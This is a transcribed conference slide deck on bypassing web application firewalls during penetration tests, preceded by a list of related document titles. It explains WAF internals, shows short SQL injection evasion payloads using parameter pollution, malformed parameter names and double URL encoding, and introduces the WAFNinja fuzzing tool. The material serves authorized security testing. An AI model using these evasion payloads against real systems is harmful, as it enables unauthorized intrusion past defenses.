Bypassing Web Application Firewalls

Similar documents
01/02/2014 SECURITY ASSESSMENT METHODOLOGIES SENSEPOST 2014 ALL RIGHTS RESERVED

n Explain penetration testing concepts n Explain vulnerability scanning concepts n Reconnaissance is the first step of performing a pen test

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

The 3 Pillars of SharePoint Security

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

Who am I? Sandro Gauci and EnableSecurity Over 8 years in the security industry Published security research papers Tools - SIPVicious and SurfJack

Web Application Penetration Testing

Application Security Approach

The Top 6 WAF Essentials to Achieve Application Security Efficacy

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

Secure Parameter Filter (SPF) (AKA Protecting Vulnerable Applications with IIS7) Justin Clarke, Andrew Carey Nairn

Web Application Attacks

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

Web Application Whitepaper

GOING WHERE NO WAFS HAVE GONE BEFORE

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

CNIT 129S: Securing Web Applications. Ch 8: Attacking Access Controls

Module 1: Penetration Testing Planning and Scoping. Module 2: Basic Usage of Linux and its services

Vulnerability Validation Tutorial

CompTIA Security+ Malware. Threats and Vulnerabilities Vulnerability Management

Injectable Exploits. New Tools for Pwning Web Apps and Browsers

haltdos - Web Application Firewall

GE Fanuc Intelligent Platforms

SECURITY TESTING. Towards a safer web world

WAF-aiki. Pentest techniques against a Web Application Firewall

Penetration Testing with Kali Linux

ASA Access Control. Section 3

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Computer Forensics: Investigating Network Intrusions and Cyber Crime, 2nd Edition. Chapter 3 Investigating Web Attacks

OWASP InfoSec Romania 2013

Specialized Security Services, Inc. REDUCE RISK WITH CONFIDENCE. s3security.com

RiskSense Attack Surface Validation for Web Applications

McAFEE PROFESSIONAL SERVICES. Unisys ClearPath OS 2200 Security Assessment White Paper

PRACTICAL WEB DEFENSE VERSION 1

Automated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation

Base64 The Security Killer

Chapter 5: Vulnerability Analysis

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Web Application Firewall

Activating Intrusion Prevention Service

Question No: 1 After running a packet analyzer on the network, a security analyst has noticed the following output:

Application security : going quicker

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

ASSURANCE PENETRATION TESTING

OWASP Top 10. Copyright 2017 Ergon Informatik AG 2/13

Executive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7

WHITE PAPER. Best Practices for Web Application Firewall Management

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

SOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications

Integrated Web Application Firewall (WAF) & Distributed Denial Of Service (DDoS) Mitigation For Today s Enterprises

Solutions Business Manager Web Application Security Assessment

java -jar Xmx2048mb /Applications/burpsuite_pro_v1.5.jar

BIG-IP Application Security Manager : Getting Started. Version 12.1

Web Penetration Testing

CompTIA. PT0-001 EXAM CompTIA PenTest+ Certification Exam Product: Demo. m/

Q Web Attack Analysis Report

Vulnerability Assessment with Application Security

n Given a scenario, analyze and interpret output from n A SPAN has the ability to copy network traffic passing n Capacity planning for traffic

How to perform the DDoS Testing of Web Applications

The Invisible Threat of Modern Malware Lee Gitzes, CISSP Comm Solutions Company

SQL Injection Attack: Detection in a Web Application Environment

Un SOC avanzato per una efficace risposta al cybercrime

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Paloalto Networks PCNSA EXAM

IC32E - Pre-Instructional Survey

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

WEB APPLICATION VULNERABILITIES

3. Apache Server Vulnerability Identification and Analysis

WEB APPLICATION SCANNERS. Evaluating Past the Base Case

Tools For Vulnerability Scanning and Penetration Testing

Firewalls for Secure Unified Communications

NETWORK AND CERTIFICATE SYSTEM SECURITY REQUIREMENTS

CIH

ShiftLeft. Real-World Runtime Protection Benchmarking

CyberSecurity. Penetration Testing. Penetration Testing. Contact one of our specialists for more information CYBERSECURITY SERVICE DATASHEET

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

High -Tech Bridge s Web Server Security Service API Developer Documentation Version v1.3 February 13 th 2018

Exam Questions v8

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

Brochure. Security. Fortify on Demand Dynamic Application Security Testing

Certified Secure Web Application Engineer

Securing Apache Tomcat. AppSec DC November The OWASP Foundation

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

5/10/2009. Introduction. The light-saber is a Jedi s weapon not as clumsy or random as a blaster.

Fundamentals of Information Systems Security Lesson 5 Auditing, Testing, and Monitoring

Sucuri Technical Overview

SDLC Maturity Models

Slides adopted from Laurie Williams. OWASP Top Ten. John Slankas

C1: Define Security Requirements

Application and Data Security with F5 BIG-IP ASM and Oracle Database Firewall

Defend Your Web Applications Against the OWASP Top 10 Security Risks. Speaker Name, Job Title

How to configure the UTM Web Application Firewall for Microsoft Lync Web Services connectivity

Chapter Three test. CompTIA Security+ SYO-401: Read each question carefully and select the best answer by circling it.

86% of websites has at least 1 vulnerability and an average of 56 per website WhiteHat Security Statistics Report 2013

Web Security, Summer Term 2012

Finding Vulnerabilities in Web Applications

Transcription:

Bypassing Web Application Firewalls an approach for pentesters KHALIL BIJJOU SECURITY CONSULTANT 17 th November 2017

BYPASSING A WAF WHY? Number of deployed Web Application Firewalls (WAFs) is increasing WAFs make a penetration test more difficult Attempting to bypass a WAF is an important aspect of a penetration test

MAIN GOAL Provide a practical approach to bypass WAFs for penetration testers in order to ensure accurate results

Introduction to Web Application Firewalls

OVERVIEW Replaces old fashioned Firewalls and IDS/IPS Understands HTTP traffic better than traditional firewalls Protects a web application by adding a security layer Checks for malicious traffic and blocks it

FUNCTIONALITY Pre-processor: Decide whether a request will be processed further Normalization: Standardize user input Validate Input: Check user input against rules

NORMALIZATION FUNCTIONS Simplifies the writing of rules No Knowledge about different forms of input needed compresswhitespace hexdecode lowercase urldecode converts whitespace chars to spaces decodes a hex-encoded string converts characters to lowercase decodes a URL-encoded string

INPUT VALIDATION Security Models define how to enforce rules Rules consist of regular expressions Three Security Models: 1. Positive Security Model 2. Negative Security Model 3. Hybrid Security Model

SECURITY MODELS Positive Security Model (Whitelist) Deny all but known good Prevents Zero-day Exploits More secure than blacklist Comprehensive understanding of application is needed Creating rules is a time-consuming process Negative Security Model (Blacklist) Allow all but known bad Shipped with WAF Fast adoption Little knowledge needed Protect several applications Tends to false positives Resource-consuming

Bypassing Methods and Techniques

OVERVIEW Pre-processor Exploitation: Make WAF skip input validation Impedance Mismatch: WAF interprets input differently than back end Rule Set Bypassing: Use Payloads that are not detected by the WAF

Pre-processor Exploitation

SKIPPING PARAMETER VERIFICATION PHP removes whitespaces from parameter names or transforms them into underscores http://www.website.com/products.php?%20productid=select 1,2,3 ASP removes % character that is not followed by two hexadecimal digits http://www.website.com/products.aspx?%productid=select 1,2,3 A WAF which does not reject unknown parameters may be bypassed

MALFORMED HTTP METHOD Misconfigured web servers may accept malformed HTTP methods A WAF that only inspects GET and POST requests may be bypassed

OVERLOADING THE WAF A WAF may be configured to skip input validation if performance load is heavy Often applies to embedded WAFs Great deal of malicious requests can be sent with the chance that the WAF will overload and let some requests through

Impedance Mismatch

HTTP PARAMETER POLLUTION Sending a number of parameters with the same name Technologies interpret this request http://www.website.com/products/?productid=1&productid=2 differently: Back end Behavior Processed ASP.NET Concatenate with comma productid=1,2 JSP First Occurrence productid=1 PHP Last Occurrence productid=2

HTTP PARAMETER POLLUTION The following payload?productid=select 1,2,3 from table can be divided:?productid=select 1&productid=2,3 from table WAF sees two individual parameters and may not detect the payload ASP.NET back end concatenates both values

DOUBLE URL ENCODING WAF normalizes URL encoded characters into ASCII text The WAF may be configured to decode characters only once Double URL Encoding a payload may result in a bypass s -> %73 -> %25%37%33 The following payload contains a double URL encoded character 1 union %25%37%33elect 1,2,3

Rule Set Bypassing

BYPASS RULE SET Two methods: Brute force by enumerating payloads Reverse-engineer the WAFs rule set

APPROACH FOR PENETRATION TESTERS

OVERVIEW Similar to the phases of a penetration test Divided into six phases, whereas Phase 0 may not always be possible

PHASE 0 DISABLE WAF Objective: find security flaws in the application more easily assessment of the security level of an application is more accurate Allows a more focused approach when the WAF is enabled May not be realizable in some penetration tests

PHASE 1 - RECONNAISSANCE Objective: Gather information to get a overview of the target Basis for the subsequent phases Gather information about: web server programming language WAF & Security Model Internal IP Addresses

PHASE 2 ATTACKING THE PRE-PROCESSOR Objective: make the WAF skip input validation Identify which parts of a HTTP request are inspected by the WAF to develop an exploit: 1. Send individual requests that differ in the location of a payload 2. Observe which requests are blocked 3. Attempt to develop an exploit

PHASE 3 FINDING AN IMPEDANCE MISMATCH Objective: make the WAF interpret a request differently than the back end and therefore not detecting it Knowledge about back end technologies is needed

PHASE 4 BYPASSING THE RULE SET Objective: find a payload that is not blocked by the WAFs rule set 1. Brute force by sending different payloads 2. Reverse-engineer the rule set in a trial and error approach: 1. Send symbols and keywords that may be useful to craft a payload 2. Observe which are blocked 3. Attempt to develop an exploit based on the results of the previous steps

PHASE 5 OTHER VULNERABILITIES Objective: find other vulnerabilities that can not be detected by the WAF Broken authentication mechanism Privilege escalation Etc.

PHASE 6 AFTER THE PENTEST Objective: Inform customer about the vulnerabilities Advise customer to fix the root cause of a vulnerability For the time being, the vulnerability should be virtually patched by adding specific rules to the WAF Explain that the WAF can help to mitigate a vulnerability, but can not thoroughly fix it

WAFNINJA

OVERVIEW CLI Tool written in Python Automates parts of the approach Already used in several penetration tests Supports HTTPS connections GET and POST parameter Usage of cookies Usage of an intercepting browser

FUZZING Sends different symbols and keywords Analyzes the response Results are displayed in a clear and concise way Fuzzing strings can be extended with the insert-fuzz function shared within a team

DISCUSSION & QUESTIONS WAFNinja: https://github.com/khalilbijjou/wafninja E-Mail: kh.bijjou@gmail.com LinkedIn Xing: Khalil Bijjou

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback